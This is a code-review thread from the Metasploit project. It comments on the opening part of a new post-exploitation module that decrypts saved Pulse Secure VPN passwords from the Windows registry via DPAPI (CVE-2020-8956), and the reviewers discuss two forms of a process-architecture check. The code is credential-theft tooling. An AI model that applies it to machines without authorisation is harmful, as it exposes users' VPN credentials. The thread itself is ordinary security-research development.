modules/post/windows/gather/credentials/pulse_secure.rb

```diff
@@ -0,0 +1,372 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::Windows::Registry
+  include Msf::Post::Windows::UserProfiles
+  include Msf::Post::Windows::Priv
+  include Msf::Auxiliary::Report
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'            => "Windows Gather Pulse Secure VPN Saved Password Extraction",
+      'Description'     => %q{
+        This module extracts and decrypts saved Pulse Secure VPN passwords from the
+        Windows Registry. This module can only access credentials created by the user the
+        process is running as.
+        It cannot link the password to a username because username is saved in
+        'C:\ProgramData\Pulse Secure\ConnectionStore\[SID].dat', which is only readable
+        by SYSTEM.
+        Note that for enterprise deployment, this username is almost always the domain
+        username.
+      },
+      'License'         => MSF_LICENSE,
+      'References' => [
+           ['CVE', '2020-8956'],
+           [ 'URL', 'https://qkaiser.github.io/reversing/2020/10/27/pule-secure-credentials'],
+           [ 'URL', 'https://www.gremwell.com/blog/reversing_pulse_secure_client_credentials_store'],
+           [ 'URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601' ]
+      ],
+      'Platform'        => ['win'],
+      'SessionTypes'    => ['meterpreter'],
+      'Author'          => ['Quentin Kaiser <kaiserquentin@gmail.com>']
+    ))
+
+  end
+
+  # Decrypts `data` encrypted with Windows DPAPI by calling CryptUnprotectData
+  # with `entropy` as pOptionalEntropy value.
+  #
+  # @param [String] data Encrypted data, pDataIn per crypt32.dll.
+  # @param [String] entropy Optional entropy value, pOptionalEntropy per crypt32.dll
+  #
+  # @return [String] Decrypted value or empty string in case of failure.
+  #
+  def decrypt_reg(data, entropy)
+    rg = session.railgun
+    pid = session.sys.process.getpid
+    process = session.sys.process.open(pid, PROCESS_ALL_ACCESS)
+
+    # write entropy to memory
+    emem = process.memory.allocate(128)
+    process.memory.write(emem, entropy)
+    # write encrypted data to memory
+    mem = process.memory.allocate(128)
+    process.memory.write(mem, data)
+
+    if session.sys.process.each_process.find { |i| i["pid"] == pid} ["arch"] == "x86"
```

Comment:
I found two different forms for doing that check:

**Version A**

```ruby
if session.sys.process.each_process.find { |i| i["pid"] == pid } ["arch"] == "x86"
```

This one is used by the following modules:
- post/multi/gather/lastpass_creds
- post/windows/gather/enum_ie
- post/windows/gather/enum_chrome
- post/windows/gather/credentials/tortoisesvn
- post/windows/gather/credentials/enum_cred_store
- post/windows/gather/credentials/outlook.rb
- post/windows/gather/credentials/enum_picasa_pwds.rb
- post/windows/gather/credentials/skype.rb

**Version B**

```ruby
 if session.sys.process.each_process.find { |i| i["pid"] == pid && i["arch"] == "x86"}
```

This one is used by the following module:
- post/windows/gather/credentials/rdc_manager_creds

I think the two are valid. The first one enumerate all processes to find the one that we're are currently executing as, and then fetch the architecture attribute of that process by doing `["arch"]` to check if it is an 32bits process or not. The second one enumerate all process to find the one we're currently executing as, while also checking the architecture by doing `&& i["arch"] == "x86"`. 

From a complexity standpoint, the first one will execute N + 1 operations while the other will execute N + N + 1 operations for N equal to the amount of running processes on the host.

Does that make sense ? I'm not used to these Ruby constructs.

Reply:
Quite confident in that code now. Marking this as resolved. Feel free to re-open if you want to discuss version A vs version B.

Reply:
@QKaiser Please don't close sections until I have had the chance to look over them. Wasn't able to review this last night, will review it now and let you know what I think.

Reply:
Okay well if your reducing operations on the host I suppose that makes sense and this may be a fair trade off for the lack of clarity that someone unfamiliar with Ruby may have with this statement. This is similar to the logic we use for ternary operators: as they have a tendency to confuse people reading the code we try to avoid their use unless it either helps compact the code in a significant way or provides some other item of material benefit to offset the potential confusion that the use of ternary operators may cause readers.

TLDR: Personally I think version B is more clear to readers and is the preferred solution but if there is some performance benefit to be gained from version A, then this may be worth taking into account.

Reply:
Kept the construct but inserted a comment. See 94af390649. Sorry for the early closing of comments.